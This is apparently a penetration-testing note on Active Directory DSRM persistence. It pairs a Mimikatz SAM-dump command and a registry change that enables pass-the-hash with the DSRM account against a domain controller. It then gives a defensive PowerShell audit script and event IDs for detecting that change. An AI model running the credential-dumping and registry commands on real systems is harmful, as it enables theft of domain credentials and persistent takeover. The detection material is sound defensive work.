DSRM (Directory Services Restore Mode)

DSRM is Directory Services Restore Mode. Every DC has a local administrator account named "Administrator" whose password is the DSRM password. The DSRM password (SafeModePassword) must be supplied when a server is promoted to a Domain Controller, and it is rarely changed afterwards. After altering the DSRM logon-behavior setting on the DC, the NTLM hash of this account can be passed to access the DC.

Execution

Dumping the SAM database

```powershell
# Dump the local SAM of the DC; the DSRM "Administrator" hash is stored there
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc
```

Requirements before you can pass the hash

```powershell
# Logon Behavior for the DSRM account needs to be changed before we can use its hash
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
```
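Because the registry value above is the switch that makes the DSRM hash usable over the network, the quickest defensive check is to read it on every DC and flag anything other than the default. The following audit script is an added example, not part of the original page; it assumes the ActiveDirectory RSAT module is installed on the management host, that WinRM is reachable on each DC, and that it is run with rights to read the DCs' registries. The value meanings (0, 1, 2) are Microsoft's documented semantics for `DsrmAdminLogonBehavior`.

```powershell
# Added example: audit all domain controllers for a non-default DsrmAdminLogonBehavior value.
# Assumptions: ActiveDirectory module available, WinRM access to each DC, sufficient rights.
$regPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# Documented meaning of each value:
#   absent/0 = DSRM account usable only when the DC is booted into DSRM (default)
#   1        = DSRM account usable when the AD DS service is stopped
#   2        = DSRM account always usable, including network logon (the setting the page applies)
$meaning = @{
    0 = 'default (DSRM boot only)'
    1 = 'allowed when AD DS is stopped'
    2 = 'always allowed (network logon possible)'
}

# Enumerate every DC in the current domain
$dcs = (Get-ADDomainController -Filter *).HostName

# Read the value remotely; a missing value is equivalent to 0
$results = Invoke-Command -ComputerName $dcs -ScriptBlock {
    param($path, $name)
    $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    [pscustomobject]@{
        DC    = $env:COMPUTERNAME
        Value = if ($null -eq $item) { 0 } else { [int]$item.$name }
    }
} -ArgumentList $regPath, $valueName

# Report: anything other than 0 is a finding that needs an owner and a reason
foreach ($r in $results) {
    $status = if ($r.Value -eq 0) { 'OK' } else { 'FINDING' }
    $desc   = if ($meaning.ContainsKey($r.Value)) { $meaning[$r.Value] } else { 'undocumented value' }
    '{0,-8} {1,-24} {2} = {3} ({4})' -f $status, $r.DC, $valueName, $r.Value, $desc
}

# Remediation for a flagged DC (run on that DC): delete the override so the default applies again.
# Remove-ItemProperty -Path $regPath -Name $valueName
```

Run this on a schedule and diff the output; a DC that flips from OK to FINDING without a change ticket is a persistence indicator. For real-time coverage, put an audit SACL on the `Lsa` key so the write is logged as Security Event ID 4657 (registry value modified), and alert on Event ID 4794 (an attempt was made to set the DSRM administrator password), since a changed DSRM password alongside this registry value is the classic combination.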